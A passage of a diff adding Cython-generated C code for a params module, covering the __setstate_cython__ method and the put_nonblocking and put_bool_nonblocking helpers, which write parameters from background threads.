__Pyx_AddTraceback("common.params_pyx.Params.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_6Params_24__setstate_cython__(((struct __pyx_obj_6common_10params_pyx_Params *)__pyx_v_self), __pyx_v___pyx_state); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_pf_6common_10params_pyx_6Params_24__setstate_cython__(CYTHON_UNUSED struct __pyx_obj_6common_10params_pyx_Params *__pyx_v_self, CYTHON_UNUSED PyObject *__pyx_v___pyx_state) { + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("__setstate_cython__", 0); + + /* "(tree fragment)":4 + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" # <<<<<<<<<<<<<< + */ + __Pyx_Raise(__pyx_builtin_TypeError, __pyx_kp_s_no_default___reduce___due_to_non, 0, 0); + __PYX_ERR(1, 4, __pyx_L1_error) + + /* "(tree fragment)":3 + * def __reduce_cython__(self): + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + * def __setstate_cython__(self, __pyx_state): # <<<<<<<<<<<<<< + * raise TypeError, "no default __reduce__ due to non-trivial __cinit__" + */ + + /* function exit code */ + __pyx_L1_error:; + __Pyx_AddTraceback("common.params_pyx.Params.__setstate_cython__", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":107 + * return self.p.allKeys() + * + * def put_nonblocking(key, val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_3put_nonblocking(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_3put_nonblocking = {"put_nonblocking", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_3put_nonblocking, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_3put_nonblocking(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_key = 0; + PyObject *__pyx_v_val = 0; + PyObject *__pyx_v_d = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("put_nonblocking (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_key,&__pyx_n_s_val,&__pyx_n_s_d,0}; + PyObject* values[3] = {0,0,0}; + values[2] = ((PyObject *)((PyObject*)__pyx_kp_u_)); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_key)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 107, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_val)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 107, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("put_nonblocking", 0, 2, 3, 1); __PYX_ERR(0, 107, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_d); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 107, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "put_nonblocking") < 0)) __PYX_ERR(0, 107, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_key = values[0]; + __pyx_v_val = values[1]; + __pyx_v_d = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("put_nonblocking", 0, 2, 3, __pyx_nargs); __PYX_ERR(0, 107, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.put_nonblocking", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_2put_nonblocking(__pyx_self, __pyx_v_key, __pyx_v_val, __pyx_v_d); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":108 + * + * def put_nonblocking(key, val, d=""): + * threading.Thread(target=lambda: Params(d).put(key, val)).start() # <<<<<<<<<<<<<< + * + * def put_bool_nonblocking(key, bool val, d=""): + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_15put_nonblocking_lambda(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_15put_nonblocking_lambda = {"lambda", (PyCFunction)__pyx_pw_6common_10params_pyx_15put_nonblocking_lambda, METH_NOARGS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_15put_nonblocking_lambda(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("lambda (wrapper)", 0); + __pyx_r = __pyx_lambda_funcdef_lambda(__pyx_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_lambda_funcdef_lambda(PyObject *__pyx_self) { + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *__pyx_cur_scope; + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *__pyx_outer_scope; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + int __pyx_t_4; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("lambda", 0); + __pyx_outer_scope = (struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *) __Pyx_CyFunction_GetClosure(__pyx_self); + __pyx_cur_scope = __pyx_outer_scope; + __Pyx_XDECREF(__pyx_r); + if (unlikely(!__pyx_cur_scope->__pyx_v_d)) { __Pyx_RaiseClosureNameError("d"); __PYX_ERR(0, 108, __pyx_L1_error) } + __pyx_t_2 = __Pyx_PyObject_CallOneArg(((PyObject *)__pyx_ptype_6common_10params_pyx_Params), __pyx_cur_scope->__pyx_v_d); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_put); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + if (unlikely(!__pyx_cur_scope->__pyx_v_key)) { __Pyx_RaiseClosureNameError("key"); __PYX_ERR(0, 108, __pyx_L1_error) } + if (unlikely(!__pyx_cur_scope->__pyx_v_val)) { __Pyx_RaiseClosureNameError("val"); __PYX_ERR(0, 108, __pyx_L1_error) } + __pyx_t_2 = NULL; + __pyx_t_4 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_2 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_2)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_2); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_4 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_2, __pyx_cur_scope->__pyx_v_key, __pyx_cur_scope->__pyx_v_val}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_4, 2+__pyx_t_4); + __Pyx_XDECREF(__pyx_t_2); __pyx_t_2 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_AddTraceback("common.params_pyx.put_nonblocking.lambda", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":107 + * return self.p.allKeys() + * + * def put_nonblocking(key, val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + */ + +static PyObject *__pyx_pf_6common_10params_pyx_2put_nonblocking(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_key, PyObject *__pyx_v_val, PyObject *__pyx_v_d) { + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *__pyx_cur_scope; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("put_nonblocking", 0); + __pyx_cur_scope = (struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *)__pyx_tp_new_6common_10params_pyx___pyx_scope_struct__put_nonblocking(__pyx_ptype_6common_10params_pyx___pyx_scope_struct__put_nonblocking, __pyx_empty_tuple, NULL); + if (unlikely(!__pyx_cur_scope)) { + __pyx_cur_scope = ((struct __pyx_obj_6common_10params_pyx___pyx_scope_struct__put_nonblocking *)Py_None); + __Pyx_INCREF(Py_None); + __PYX_ERR(0, 107, __pyx_L1_error) + } else { + __Pyx_GOTREF((PyObject *)__pyx_cur_scope); + } + __pyx_cur_scope->__pyx_v_key = __pyx_v_key; + __Pyx_INCREF(__pyx_cur_scope->__pyx_v_key); + __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_key); + __pyx_cur_scope->__pyx_v_val = __pyx_v_val; + __Pyx_INCREF(__pyx_cur_scope->__pyx_v_val); + __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_val); + __pyx_cur_scope->__pyx_v_d = __pyx_v_d; + __Pyx_INCREF(__pyx_cur_scope->__pyx_v_d); + __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_d); + + /* "common/params_pyx.pyx":108 + * + * def put_nonblocking(key, val, d=""): + * threading.Thread(target=lambda: Params(d).put(key, val)).start() # <<<<<<<<<<<<<< + * + * def put_bool_nonblocking(key, bool val, d=""): + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_threading); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_Thread); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyDict_NewPresized(1); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = __Pyx_CyFunction_New(&__pyx_mdef_6common_10params_pyx_15put_nonblocking_lambda, 0, __pyx_n_s_put_nonblocking_locals_lambda, ((PyObject*)__pyx_cur_scope), __pyx_n_s_common_params_pyx, __pyx_d, NULL); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + if (PyDict_SetItem(__pyx_t_2, __pyx_n_s_target, __pyx_t_4) < 0) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = __Pyx_PyObject_Call(__pyx_t_3, __pyx_empty_tuple, __pyx_t_2); if (unlikely(!__pyx_t_4)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_4); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + __pyx_t_2 = __Pyx_PyObject_GetAttrStr(__pyx_t_4, __pyx_n_s_start); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __Pyx_DECREF(__pyx_t_4); __pyx_t_4 = 0; + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_2))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_2); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_2); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_2, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[1] = {__pyx_t_4, }; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_2, __pyx_callargs+1-__pyx_t_5, 0+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 108, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + } + __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; + + /* "common/params_pyx.pyx":107 + * return self.p.allKeys() + * + * def put_nonblocking(key, val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + */ + + /* function exit code */ + __pyx_r = Py_None; __Pyx_INCREF(Py_None); + goto __pyx_L0; + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("common.params_pyx.put_nonblocking", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_DECREF((PyObject *)__pyx_cur_scope); + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":110 + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + * def put_bool_nonblocking(key, bool val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put_bool(key, val)).start() + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_5put_bool_nonblocking(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_5put_bool_nonblocking = {"put_bool_nonblocking", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_6common_10params_pyx_5put_bool_nonblocking, __Pyx_METH_FASTCALL|METH_KEYWORDS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_5put_bool_nonblocking(PyObject *__pyx_self, +#if CYTHON_METH_FASTCALL +PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds +#else +PyObject *__pyx_args, PyObject *__pyx_kwds +#endif +) { + PyObject *__pyx_v_key = 0; + bool __pyx_v_val; + PyObject *__pyx_v_d = 0; + #if !CYTHON_METH_FASTCALL + CYTHON_UNUSED const Py_ssize_t __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); + #endif + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("put_bool_nonblocking (wrapper)", 0); + { + PyObject **__pyx_pyargnames[] = {&__pyx_n_s_key,&__pyx_n_s_val,&__pyx_n_s_d,0}; + PyObject* values[3] = {0,0,0}; + values[2] = ((PyObject *)((PyObject*)__pyx_kp_u_)); + if (__pyx_kwds) { + Py_ssize_t kw_args; + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + CYTHON_FALLTHROUGH; + case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + CYTHON_FALLTHROUGH; + case 0: break; + default: goto __pyx_L5_argtuple_error; + } + kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); + switch (__pyx_nargs) { + case 0: + if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_key)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 110, __pyx_L3_error) + else goto __pyx_L5_argtuple_error; + CYTHON_FALLTHROUGH; + case 1: + if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_val)) != 0)) kw_args--; + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 110, __pyx_L3_error) + else { + __Pyx_RaiseArgtupleInvalid("put_bool_nonblocking", 0, 2, 3, 1); __PYX_ERR(0, 110, __pyx_L3_error) + } + CYTHON_FALLTHROUGH; + case 2: + if (kw_args > 0) { + PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_d); + if (value) { values[2] = value; kw_args--; } + else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 110, __pyx_L3_error) + } + } + if (unlikely(kw_args > 0)) { + const Py_ssize_t kwd_pos_args = __pyx_nargs; + if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "put_bool_nonblocking") < 0)) __PYX_ERR(0, 110, __pyx_L3_error) + } + } else { + switch (__pyx_nargs) { + case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); + CYTHON_FALLTHROUGH; + case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); + values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); + break; + default: goto __pyx_L5_argtuple_error; + } + } + __pyx_v_key = values[0]; + __pyx_v_val = __Pyx_PyObject_IsTrue(values[1]); if (unlikely((__pyx_v_val == ((bool)-1)) && PyErr_Occurred())) __PYX_ERR(0, 110, __pyx_L3_error) + __pyx_v_d = values[2]; + } + goto __pyx_L4_argument_unpacking_done; + __pyx_L5_argtuple_error:; + __Pyx_RaiseArgtupleInvalid("put_bool_nonblocking", 0, 2, 3, __pyx_nargs); __PYX_ERR(0, 110, __pyx_L3_error) + __pyx_L3_error:; + __Pyx_AddTraceback("common.params_pyx.put_bool_nonblocking", __pyx_clineno, __pyx_lineno, __pyx_filename); + __Pyx_RefNannyFinishContext(); + return NULL; + __pyx_L4_argument_unpacking_done:; + __pyx_r = __pyx_pf_6common_10params_pyx_4put_bool_nonblocking(__pyx_self, __pyx_v_key, __pyx_v_val, __pyx_v_d); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":111 + * + * def put_bool_nonblocking(key, bool val, d=""): + * threading.Thread(target=lambda: Params(d).put_bool(key, val)).start() # <<<<<<<<<<<<<< + */ + +/* Python wrapper */ +static PyObject *__pyx_pw_6common_10params_pyx_20put_bool_nonblocking_lambda1(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused); /*proto*/ +static PyMethodDef __pyx_mdef_6common_10params_pyx_20put_bool_nonblocking_lambda1 = {"lambda1", (PyCFunction)__pyx_pw_6common_10params_pyx_20put_bool_nonblocking_lambda1, METH_NOARGS, 0}; +static PyObject *__pyx_pw_6common_10params_pyx_20put_bool_nonblocking_lambda1(PyObject *__pyx_self, CYTHON_UNUSED PyObject *unused) { + CYTHON_UNUSED PyObject *const *__pyx_kwvalues = __Pyx_KwValues_VARARGS(__pyx_args, __pyx_nargs); + PyObject *__pyx_r = 0; + __Pyx_RefNannyDeclarations + __Pyx_RefNannySetupContext("lambda1 (wrapper)", 0); + __pyx_r = __pyx_lambda_funcdef_lambda1(__pyx_self); + + /* function exit code */ + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +static PyObject *__pyx_lambda_funcdef_lambda1(PyObject *__pyx_self) { + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *__pyx_cur_scope; + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *__pyx_outer_scope; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("lambda1", 0); + __pyx_outer_scope = (struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *) __Pyx_CyFunction_GetClosure(__pyx_self); + __pyx_cur_scope = __pyx_outer_scope; + __Pyx_XDECREF(__pyx_r); + if (unlikely(!__pyx_cur_scope->__pyx_v_d)) { __Pyx_RaiseClosureNameError("d"); __PYX_ERR(0, 111, __pyx_L1_error) } + __pyx_t_2 = __Pyx_PyObject_CallOneArg(((PyObject *)__pyx_ptype_6common_10params_pyx_Params), __pyx_cur_scope->__pyx_v_d); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = __Pyx_PyObject_GetAttrStr(__pyx_t_2, __pyx_n_s_put_bool); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_3); + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + if (unlikely(!__pyx_cur_scope->__pyx_v_key)) { __Pyx_RaiseClosureNameError("key"); __PYX_ERR(0, 111, __pyx_L1_error) } + __pyx_t_2 = __Pyx_PyBool_FromLong(__pyx_cur_scope->__pyx_v_val); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_4 = NULL; + __pyx_t_5 = 0; + if (CYTHON_UNPACK_METHODS && likely(PyMethod_Check(__pyx_t_3))) { + __pyx_t_4 = PyMethod_GET_SELF(__pyx_t_3); + if (likely(__pyx_t_4)) { + PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); + __Pyx_INCREF(__pyx_t_4); + __Pyx_INCREF(function); + __Pyx_DECREF_SET(__pyx_t_3, function); + __pyx_t_5 = 1; + } + } + { + PyObject *__pyx_callargs[3] = {__pyx_t_4, __pyx_cur_scope->__pyx_v_key, __pyx_t_2}; + __pyx_t_1 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 2+__pyx_t_5); + __Pyx_XDECREF(__pyx_t_4); __pyx_t_4 = 0; + __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; + if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_1); + __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; + } + __pyx_r = __pyx_t_1; + __pyx_t_1 = 0; + goto __pyx_L0; + + /* function exit code */ + __pyx_L1_error:; + __Pyx_XDECREF(__pyx_t_1); + __Pyx_XDECREF(__pyx_t_2); + __Pyx_XDECREF(__pyx_t_3); + __Pyx_XDECREF(__pyx_t_4); + __Pyx_AddTraceback("common.params_pyx.put_bool_nonblocking.lambda1", __pyx_clineno, __pyx_lineno, __pyx_filename); + __pyx_r = NULL; + __pyx_L0:; + __Pyx_XGIVEREF(__pyx_r); + __Pyx_RefNannyFinishContext(); + return __pyx_r; +} + +/* "common/params_pyx.pyx":110 + * threading.Thread(target=lambda: Params(d).put(key, val)).start() + * + * def put_bool_nonblocking(key, bool val, d=""): # <<<<<<<<<<<<<< + * threading.Thread(target=lambda: Params(d).put_bool(key, val)).start() + */ + +static PyObject *__pyx_pf_6common_10params_pyx_4put_bool_nonblocking(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_key, bool __pyx_v_val, PyObject *__pyx_v_d) { + struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *__pyx_cur_scope; + PyObject *__pyx_r = NULL; + __Pyx_RefNannyDeclarations + PyObject *__pyx_t_1 = NULL; + PyObject *__pyx_t_2 = NULL; + PyObject *__pyx_t_3 = NULL; + PyObject *__pyx_t_4 = NULL; + int __pyx_t_5; + int __pyx_lineno = 0; + const char *__pyx_filename = NULL; + int __pyx_clineno = 0; + __Pyx_RefNannySetupContext("put_bool_nonblocking", 0); + __pyx_cur_scope = (struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *)__pyx_tp_new_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking(__pyx_ptype_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking, __pyx_empty_tuple, NULL); + if (unlikely(!__pyx_cur_scope)) { + __pyx_cur_scope = ((struct __pyx_obj_6common_10params_pyx___pyx_scope_struct_1_put_bool_nonblocking *)Py_None); + __Pyx_INCREF(Py_None); + __PYX_ERR(0, 110, __pyx_L1_error) + } else { + __Pyx_GOTREF((PyObject *)__pyx_cur_scope); + } + __pyx_cur_scope->__pyx_v_key = __pyx_v_key; + __Pyx_INCREF(__pyx_cur_scope->__pyx_v_key); + __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_key); + __pyx_cur_scope->__pyx_v_val = __pyx_v_val; + __pyx_cur_scope->__pyx_v_d = __pyx_v_d; + __Pyx_INCREF(__pyx_cur_scope->__pyx_v_d); + __Pyx_GIVEREF(__pyx_cur_scope->__pyx_v_d); + + /* "common/params_pyx.pyx":111 + * + * def put_bool_nonblocking(key, bool val, d=""): + * threading.Thread(target=lambda: Params(d).put_bool(key, val)).start() # <<<<<<<<<<<<<< + */ + __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_threading); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 111, __pyx_L1_error) + __Pyx_GOTREF(__pyx_t_2); + __pyx_t_3 = 